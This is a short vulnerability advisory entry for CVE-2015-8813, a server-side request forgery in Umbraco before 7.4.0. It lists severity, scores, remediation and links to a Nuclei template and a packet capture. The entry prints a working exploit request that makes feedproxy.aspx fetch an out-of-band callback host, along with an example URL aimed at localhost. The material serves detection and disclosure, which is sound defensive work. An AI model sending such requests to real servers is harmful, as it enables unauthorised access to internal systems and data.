| Title | Umbraco <7.4.0- Server-Side Request Forgery |
|---|---|
| Author | emadshanab |
| Severity | High |
| Impact | The vulnerability can result in unauthorized access to sensitive information or systems, leading to potential data breaches or further exploitation. |
| Remediation | Upgrade Umbraco to version 7.4.0 or above to mitigate the vulnerability and apply any necessary patches or security updates. |
| CVSS Score | 8.2 |
| EPSS Score | 0.83448 |
| CVE ID | CVE-2015-8813 |
| CWE ID | CWE-918 |
| Tags | cve2015 cve ssrf oast umbraco vkev vuln |
Umbraco before version 7.4.0 contains a server-side request forgery vulnerability in feedproxy.aspx that allows attackers to send arbitrary HTTP GET requests via http://local/Umbraco/feedproxy.aspx?url=http://127.0.0.1:80/index.
GET /Umbraco/feedproxy.aspx?url=http://d5jqp6hle0o3ai3j5e9g161wnwq9g5y79.oast.site HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:125.0) Gecko/20100101 Firefox/125.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2015/CVE-2015-8813.yaml
🦈 Packet Capture: ⬇️ Download cve-2015-8813.pcap
N/AN/A